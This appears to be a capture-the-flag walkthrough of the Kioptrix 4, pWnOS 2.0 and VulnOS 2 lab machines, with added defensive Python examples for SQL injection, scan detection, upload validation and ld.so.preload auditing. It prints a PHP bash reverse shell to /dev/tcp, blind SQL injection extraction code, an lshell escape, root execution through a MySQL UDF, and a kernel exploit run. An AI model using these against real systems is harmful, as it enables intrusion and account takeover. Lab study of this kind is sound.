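one. It then recovers john's password through the boolean oracle the way
sqlmap's boolean-based blind mode did, using SQLite's UNICODE() where MySQL
would use ASCII()/ORD(). Table, row data and function names are assumptions.
"""
import sqlite3

# sqlmap's boolean-based payload from the run above
PAYLOAD = "-4226' OR 5600=5600-- bMfZ"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the members table dumped above."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")],
    )
    return con


def login_vulnerable(con, username: str, password: str):
    """PHP-style string building: the password becomes part of the SQL text,
    so a quote closes the literal and `OR 5600=5600` makes WHERE true for
    every row. Returns the first matching username or None."""
    sql = (
        f"SELECT username FROM members WHERE username='{username}' "
        f"AND password='{password}'"
    )
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username: str, password: str):
    """Placeholders: the values travel separately from the SQL text, so the
    same payload is just a password that matches nobody."""
    row = con.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def make_oracle(con):
    """True/False oracle: did the injected condition make the login succeed?"""
    def oracle(condition: str) -> bool:
        return login_vulnerable(con, "erik", f"x' OR ({condition})-- ") is not None
    return oracle


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the result of `subquery` one character at a time with a binary
    search over printable ASCII: about 8 requests per character, which is why
    sqlmap's log shows the values appearing letter by letter."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"LENGTH(({subquery}))>={pos}"):
            break
        lo, hi = 32, 126
        while lo <= hi:
            mid = (lo + hi) // 2
            if oracle(f"UNICODE(SUBSTR(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid - 1
        result += chr(lo)
    return result


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, "erik", PAYLOAD))
    print("safe:      ", login_safe(con, "erik", PAYLOAD))
    print("blind:     ", blind_extract(make_oracle(con),
                                       "SELECT password FROM members WHERE username='john'"))
```

The fix is the second function: the same query with placeholders, where the driver never lets the password become SQL. On the real box the oracle would be the HTTP response (the 302 to login_success.php versus "Wrong Username or Password"), which is exactly the difference sqlmap keyed on.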
I tried john and I can log in, but then nothing:

Same for robert…

Trying ssh:

ssh john@192.168.79.217
The authenticity of host ‘192.168.79.217 (192.168.79.217)’ can’t be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.79.217’ (RSA) to the list of known hosts.
john@192.168.79.217’s password:
Welcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
john:~$

Bingo!

But both are very restricted; only a few commands are available:

Welcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
robert:~$ cd /home/robert
robert:~$ ll
total 0
robert:~$ help
cd clear echo exit help ll lpath ls
robert:~$ lpath
Allowed:
/home/robert

Trying to create a file

robert:~$ echo “1”>1.txt
*** forbidden syntax -> “echo “1”>1.txt”
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

robert:~$ echo 1
1

robert:~$ echo <?php phpinfo()?>
*** forbidden syntax -> “echo <?php phpinfo()?>”
*** Kicked out

Looks like the SMB password is the same:

root@kali:~/boxes/kioptrix# smbclient -U john //192.168.79.217/IPC$
Enter WORKGROUP\john’s password:
Try “help” to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!

but then nothing…

Trying the printer share:

smbclient -U robert //192.168.79.217/print$
Enter WORKGROUP\robert’s password:
Try “help” to get a list of possible commands.
smb: \> dir
. D 0 Sat Feb 4 10:57:48 2012
.. D 0 Sat Feb 4 11:16:24 2012
W32X86 D 0 Mon Mar 9 07:25:45 2009
WIN40 D 0 Mon Mar 9 07:25:45 2009

4916892 blocks of size 1024. 3581296 blocks available

Went back to lshell and found a way to escalate. This is a known escape for lshell 0.9.12 (the version sitting in /root): the argument to the built-in echo is handed to the Python interpreter underneath lshell, so os.system() spawns an unrestricted bash:

ssh john@192.168.79.217
john@192.168.79.217’s password:
Welcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
john:~$ echo os.system('/bin/bash')

john@Kioptrix4:~$ ll
bash: ll: command not found
john@Kioptrix4:~$ alias ll="ls -al"
john@Kioptrix4:~$ ll
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw——- 1 john john 61 2012-02-04 23:31 .bash_history
-rw-r–r– 1 john john 220 2012-02-04 18:04 .bash_logout
-rw-r–r– 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r–r– 1 john john 312 2019-06-06 08:46 .lhistory
-rw-r–r– 1 john john 586 2012-02-04 18:04 .profile


Weird…. The flag is readable by everyone:
cd /root
john@Kioptrix4:/root$ ll
total 44
drwxr-xr-x 4 root root 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw——- 1 root root 59 2012-02-06 20:24 .bash_history
-rw-r–r– 1 root root 2227 2007-10-20 07:51 .bashrc
-rw-r–r– 1 root root 625 2012-02-06 10:48 congrats.txt
-rw-r–r– 1 root root 1 2012-02-05 10:38 .lhistory
drwxr-xr-x 8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12
-rw——- 1 root root 1 2012-02-05 10:38 .mysql_history
-rw——- 1 root root 5 2012-02-06 18:38 .nano_history
-rw-r–r– 1 root root 141 2007-10-20 07:51 .profile
drwx------ 2 root root 4096 2012-02-06 11:43 .ssh
john@Kioptrix4:/root$ cat congrats.txt


Congratulations!
You’ve got root.

There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret
——————————–
So still searching!

MySQL is running as root and the sys_exec() UDF is available, so commands run from SQL execute as root:

mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL |
+-----------------------------------------------------+
1 row in set (0.02 sec)

mysql> \! sh
$ cat /tmp/out
uid=0(root) gid=0(root)

Note that \! spawns the shell as the user running the mysql client (john here), not as root: the root-level execution comes from sys_exec(), which is why the command chowns its output to john first. /root itself is world-readable (drwxr-xr-x), which is why the listing below works from that shell.

$ cd /root
$ ls
congrats.txt lshell-0.9.12
$ cat congrats.txt
(same congrats.txt as above, signed loneferret)

pWnOS: 2.0

nmap -Pn -T4 10.10.10.1/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-04 15:24 ADT
Nmap scan report for 10.10.10.100
Host is up (0.00044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 94:65:9C:41:A0:D7 (Intel Corporate)

Starting gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.100 > /root/boxes/pwnos/reco.txt
2019/06/04 15:29:28 Starting gobuster
2019/06/04 15:30:30 Finished

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.100/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/index (Status: 200)
/login (Status: 200)
/register (Status: 200)
/info (Status: 200)
/blog (Status: 301)
/includes (Status: 301)
/activate (Status: 302)
/server-status (Status: 403)
=====================================================

Going to the website, I registered, activated the account and logged in… then nothing happens!

Not much for now.

Checking the blog directory:

In the source I see
<meta name=”generator” content=”Simple PHP Blog 0.4.0″ />

Searching for exploit:
Simple PHP Blog 0.4 – ‘colors.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26463.txt
Simple PHP Blog 0.4 – ‘preview_cgi.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26461.txt
Simple PHP Blog 0.4 – ‘preview_static_cgi.php’ Multiple Cross-Site Scripting Vulnerabiliti | exploits/cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 – Multiple Remote Exploits | exploits/php/webapps/1191.pl
Simple PHP Blog 0.4.0 – Remote Command Execution (Metasploit) | exploits/php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 – Remote Command Execution | exploits/php/webapps/1581.pl


The exploit 1191.pl is interesting: it can show the login/password hash:

I found $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/

Trying to identify the format:

/usr/share/exploitdb# hashid '$1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/'

Analyzing '$1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/'
[+] MD5 Crypt
[+] Cisco-IOS(MD5)
[+] FreeBSD MD5

Then using hashcat (mode 500 is md5crypt):
hashcat -m 500 --force -a 0 -o cracked hash /usr/share/wordlists/rockyou.txt

Session……….: hashcat
Status………..: Cracked
Hash.Type……..: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target……: $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/
Time.Started…..: Wed Jun 5 12:50:27 2019 (26 secs)
Time.Estimated…: Wed Jun 5 12:50:53 2019 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 4376 H/s (8.03ms) @ Accel:128 Loops:62 Thr:1 Vec:8
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 112640/14344385 (0.79%)
Rejected………: 0/112640 (0.00%)
Restore.Point….: 112128/14344385 (0.78%)
Restore.Sub.#1…: Salt:0 Amplifier:0-1 Iteration:992-1000
Candidates.#1….: ethan11 -> chambers1

In the meantime, trying something else: the same exploit can also overwrite the blog's admin credentials:

perl 1191.pl -h http://10.10.10.100/blog -e 3 -U erik -P erik

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit….


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: erik
Password is set to: erik

I’m in!

Went to upload an image and uploaded the following PHP reverse shell instead (reverse.php), calling back to my machine on 443:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/443 0>&1'");?>

It worked!

Then on kali:
nc -lnvp 443

Then in the browser I went to http://10.10.10.100/blog/images/reverse.php

Bingo!

nc -lnvp 443
listening on [any] 443 …
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.100] 36116
bash: no job control in this shell
www-data@web:/var/www/blog/images$

Upgrade to a proper shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Ctrl-Z
stty raw -echo
fg, then Enter twice

export TERM=screen
reset

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now trying to escalate:
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

Nothing in sudoers or SUID binaries.

Tried different exploits.. nothing

Checking MySQL, as the root password is in mysqli_connect.php:

// Set the database access information as constants:

DEFINE (‘DB_USER’, ‘root’);
DEFINE (‘DB_PASSWORD’, ‘root@ISIntS’);
DEFINE (‘DB_HOST’, ‘localhost’);
DEFINE (‘DB_NAME’, ‘ch16’);

mysql -u root -p

Then: select do_system('id > /tmp/out; chown www-data.www-data /tmp/out');

Didn't work… the sys/do_system UDF isn't installed on this box.

Tried to log in as root using the same password (password reuse between MySQL and the system account):

BINGO!

/home$ su -
Password:
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# cd /root
root@web:~# ll
total 32
drwx------ 4 root root 4096 2011-05-09 19:25 ./
drwxr-xr-x 21 root root 4096 2011-05-07 13:37 ../
drwx------ 2 root root 4096 2011-05-07 15:12 .aptitude/
-rw-r--r-- 1 root root 107 2011-05-09 19:29 .bash_history
-rw-r--r-- 1 root root 3106 2010-10-21 08:47 .bashrc
drwx------ 2 root root 4096 2011-05-07 17:18 .cache/
-rw-r--r-- 1 root root 0 2011-05-09 19:24 .mysql_history
-rw-r--r-- 1 root root 140 2010-10-21 08:47 .profile
-rw------- 1 root root 837 2011-05-09 19:16 .viminfo

VulnOS: 2

Vulnos is on 192.168.57.5

Quick scan:

Nmap scan report for 192.168.57.5
Host is up (0.000093s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
MAC Address: 08:00:27:16:B1:0E (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I checked the website. Following the link leads to an e-commerce website.

Not much there for now.
Checking robots.txt… found a lot of things:

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these “robots” where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

However, some files/folders are not accessible (clean URLs) or restricted:

The source of the page indicates that it is running drupal 7:
<meta name=”Generator” content=”Drupal 7 (http://drupal.org)” />

Let’s try gobuster

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5/jabc

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/jabc/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:35:56 Starting gobuster
=====================================================
/templates (Status: 301)
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/sites (Status: 301)
/includes (Status: 301)
/profiles (Status: 301)
=====================================================
2019/05/29 11:37:15 Finished
=====================================================

and

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:36:06 Starting gobuster
=====================================================
/javascript (Status: 301)
/server-status (Status: 403)
=====================================================
2019/05/29 11:37:27 Finished

Nothing there!
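The two gobuster runs above are what a wordlist scan looks like from the attacker's side; from the server's side they leave a burst of 404s from one client in the access log. As an added example (not part of the original post), here is a small detector for that pattern over Apache/nginx combined-format log lines. The log lines are constructed for the example, and the one-minute window and 20-hit threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line, e.g.
# 192.168.57.1 - - [29/May/2019:11:35:56 +0200] "GET /jabc/admin HTTP/1.1" 404 285 "-" "gobuster/2.0.1"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_scanners(lines, window=timedelta(seconds=60), threshold=20):
    """Return {ip: peak_404s} for clients that produced at least `threshold`
    404 responses inside any sliding window of length `window`.

    Wordlist-driven tools hit many non-existent paths in quick succession,
    while a browsing user produces only the occasional 404 (a missing
    favicon, a stale link)."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            by_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # shrink the window from the left until it spans at most `window`
            while times[end] - times[start] > window:
                start += 1
            hits = end - start + 1
            if hits >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), hits)
    return flagged

# Constructed sample log (not captured from the box): 32 rapid 404s from one
# client with a gobuster User-Agent, plus a normal visitor with a single 404.
SCAN_WORDS = ["admin", "backup", "cgi-bin", "test", "old", "config", "tmp", "private"]
SAMPLE_LOG = [
    '192.168.57.1 - - [29/May/2019:11:35:%02d +0200] "GET /jabc/%s HTTP/1.1" 404 285 "-" "gobuster/2.0.1"'
    % (i, word)
    for i, word in enumerate(SCAN_WORDS * 4)
] + [
    '192.168.57.20 - - [29/May/2019:11:36:10 +0200] "GET /jabc/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.57.20 - - [29/May/2019:11:36:12 +0200] "GET /favicon.ico HTTP/1.1" 404 285 "http://192.168.57.5/jabc/" "Mozilla/5.0"',
    'this line is not in combined format and is skipped',
]

if __name__ == "__main__":
    for ip, hits in find_scanners(SAMPLE_LOG).items():
        print("possible directory brute force from %s: %d 404s in 60s" % (ip, hits))
```

The sliding window is what keeps the false-positive rate down: a client that accumulates 20 404s over a whole day never trips it, while a scanner that does so in seconds does. Note that 301 responses (the hits gobuster actually reported above) are normal traffic and are deliberately not counted.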

I went back to jabc and found this:

But when I try to access it, I receive an empty response.

Tried the login page and sent it to Burp:

POST /jabc/?q=user/login/ HTTP/1.1
Host: 192.168.57.5
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.57.5/jabc/?q=user/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Cookie: has_js=1; SESS44909b7d2458c4a03ee24e5944921617=EQ2aVhZRa0Mnu0vb1oHH_8bDB3b69zYURxi9ZFaityc
Connection: close
Upgrade-Insecure-Requests: 1

name=erik&pass=ckp9rvq2&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in

Then tried wfuzz:
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt --hc 186 -d "name=admin&pass=FUZZ&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in" http://192.168.57.5/jabc/ > /root/boxes/VulnOS2/fuzz.txt

Nothing

Went back to the webpage and checked Documentation.
In the page source, there is a new URL and a guest login/password:
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest</span></p>

I did log in as guest.
Then searched for an exploit:

2) Improper Access Control in OpenDocMan: CVE-2014-1946

The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user's profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.

The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>
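The bug class behind CVE-2014-1946 is mass assignment: the profile-update handler copies whatever fields the client posts (including admin) into whichever record the posted id selects. As an added example (not OpenDocMan's code, and the user table and field names are assumptions), here is that anti-pattern in Python beside a hardened handler that binds the target to the caller, allow-lists fields by role, and reports anything it dropped so it can be logged.

```python
import copy

# Constructed user table, keyed by id. Field names are assumptions for this
# example, not OpenDocMan's real schema.
USERS = {
    1: {"username": "webmin", "email": "webmin@example.test", "admin": 1},
    2: {"username": "guest",  "email": "guest@example.test",  "admin": 0},
}

# Fields an ordinary user may change on their own record.
SELF_EDITABLE = {"email"}
# Fields only an administrator may change (on any record).
ADMIN_EDITABLE = {"username", "admin"}
# Form plumbing that is never profile data.
PLUMBING = ("updateuser", "login", "id")

def _coerce(field, value):
    return int(value) if field == "admin" else value

def update_profile_vulnerable(users, current_user_id, form):
    """Mass-assignment anti-pattern: every posted field is written into the
    record selected by the posted id, so a guest who adds admin=1 to the
    form becomes an administrator."""
    users = copy.deepcopy(users)
    target = int(form.get("id", current_user_id))
    for field, value in form.items():
        if field in PLUMBING:
            continue
        users[target][field] = _coerce(field, value)
    return users

def update_profile_hardened(users, current_user_id, form):
    """Same handler with server-side authorization:
    - the target record must be the caller's own unless the caller is an admin;
    - only allow-listed fields are written, and the list depends on the caller's role;
    - every other posted field is ignored and returned for logging."""
    users = copy.deepcopy(users)
    actor = users[current_user_id]
    target = int(form.get("id", current_user_id))
    if target != current_user_id and not actor["admin"]:
        raise PermissionError("only administrators may edit other accounts")
    allowed = SELF_EDITABLE | (ADMIN_EDITABLE if actor["admin"] else set())
    ignored = []
    for field, value in form.items():
        if field in allowed:
            users[target][field] = _coerce(field, value)
        elif field not in PLUMBING:
            ignored.append(field)
    return users, ignored

if __name__ == "__main__":
    form = {"updateuser": "1", "admin": "1", "id": "2", "login": "Run"}
    print("vulnerable:", update_profile_vulnerable(USERS, 2, form)[2])
    print("hardened:  ", update_profile_hardened(USERS, 2, form))
```

The key design point is that the role check lives on the server and the allow-list is derived from the authenticated session, never from the request body. An unexpected admin field from a non-admin session is a useful detection signal in its own right, which is why the hardened handler returns the ignored field names instead of silently discarding them.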

Modified guest to be admin. But still not enough privileges.
I tried to upload a PHP script, but it was refused due to MIME type checks.
I can, however, modify the webmin user's password.

Bingo! Admin!

(Login webmin, password admin)

I uploaded my reverse shell php code:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.124/443 0>&1'");
?>

and ran nc -lvnp 443 on my Kali box.

But I still could not get the PHP to execute.

Checked the settings and found the dataDir.

But files are stored with a .dat extension, so I still cannot execute PHP.

I tried to upload it as reverse.php.png

But still cannot execute it.

/var/www/html/jabcd0cs/uploads/
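The three things that stopped the upload route above (MIME checking, storage under a neutral .dat name, and a dataDir the web server does not execute from) are exactly the layers a file-upload handler should have. As an added example (not OpenDocMan's code; the allow-lists and marker strings are assumptions), here is a validator that rejects reverse.php.png and a PHP file disguised as an image, and a store function that writes accepted files under a random .dat name.

```python
import os
import secrets

# Allowed extensions and the MIME type each must be declared with.
ALLOWED_EXT = {".png": "image/png", ".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".pdf": "application/pdf"}
# Leading bytes ("magic") that real files of each type start with.
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff", "application/pdf": b"%PDF-"}
# Extensions that must never appear anywhere in the name (catches reverse.php.png).
SCRIPT_EXT = {".php", ".phtml", ".php3", ".php5", ".phar", ".pl", ".py", ".sh", ".cgi", ".htaccess"}
# Byte sequences that have no business inside an image or PDF upload.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

def validate_upload(filename, data, declared_mime):
    """Return (accepted, reason). Every check must pass for the file to be accepted."""
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    ext = "." + parts[-1]
    if ext not in ALLOWED_EXT:
        return False, "extension %s not allowed" % ext
    if any("." + p in SCRIPT_EXT for p in parts[1:-1]):
        return False, "script extension embedded in name"
    expected = ALLOWED_EXT[ext]
    if declared_mime != expected:
        return False, "declared type %s does not match %s" % (declared_mime, ext)
    if not data.startswith(MAGIC[expected]):
        return False, "content does not look like %s" % expected
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script markers inside file content"
    return True, "ok"

def storage_name():
    """Random, extension-neutral name: the client's filename never reaches disk."""
    return secrets.token_hex(16) + ".dat"

def store_upload(filename, data, declared_mime, data_dir):
    """Validate, then write under data_dir, which should sit outside the web root
    (like the dataDir setting in this walkthrough). Returns the stored name."""
    ok, reason = validate_upload(filename, data, declared_mime)
    if not ok:
        raise ValueError(reason)
    stored = storage_name()
    with open(os.path.join(data_dir, stored), "wb") as fh:
        fh.write(data)
    return stored
```

The magic-byte check is what defeats the "rename it .png" trick: a PHP file still starts with "<?php", not with the PNG signature. The neutral .dat name and out-of-webroot directory are defence in depth for the case where validation is bypassed, since a file the web server will neither serve nor hand to the PHP interpreter cannot be turned into a shell.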

Searching for vulnerabilities:
OpenDocMan 1.3.4 - 'search.php where' SQL Injection | exploits/php/webapps/46500.txt

Trying sqlmap to enumerate webmin password:

sqlmap --url "http://192.168.56.104//jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs

Then finding the user table and finally grabbing the password hash for webmin.

Once the hash is cracked: webmin1980

Then SSH into the box:

ssh webmin@192.168.56.104
webmin@192.168.56.104's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Tue Jun 4 15:20:49 CEST 2019

System load: 0.0 Processes: 84
Usage of /: 5.8% of 29.91GB Users logged in: 0
Memory usage: 12% IP address for eth0: 192.168.56.104
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Tue Jun 4 15:20:49 2019 from 192.168.56.1

Getting a proper shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Then checking os version:

lsb_release -a

No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.4 LTS
Release: 14.04
Codename: trusty

searchsploit:
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege | exploits/linux/local/37292.c

Compile the code and execute:

webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ gcc -o test test.c
webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ ./test
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
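One line in that output matters to defenders: "/etc/ld.so.preload created". On a normal server that file does not exist, so its appearance, or an entry in it pointing at a library in a user-writable directory, is a cheap and reliable post-exploitation indicator. As an added example (not part of the original post), here is a small audit of the file's contents; the library path in the test is a constructed placeholder, and the allow-list is assumed empty on most hosts.

```python
import os

# Directories an unprivileged user can typically write to; a preload library
# living there is a strong sign of tampering.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

def audit_ld_preload_text(text, allowlist=()):
    """Inspect the contents of an ld.so.preload file and return a list of findings.
    An empty list means nothing suspicious. `allowlist` holds library paths the
    host is known to preload legitimately (assumed empty on most servers)."""
    findings = []
    entries = [ln.strip() for ln in text.splitlines()
               if ln.strip() and not ln.lstrip().startswith("#")]
    for entry in entries:
        if entry in allowlist:
            continue
        findings.append("unexpected preload entry: %s" % entry)
        if not entry.startswith("/"):
            findings.append("relative path in preload entry: %s" % entry)
        elif entry.startswith(WRITABLE_PREFIXES):
            findings.append("preload library in user-writable location: %s" % entry)
    return findings

def audit_ld_preload(path="/etc/ld.so.preload", allowlist=()):
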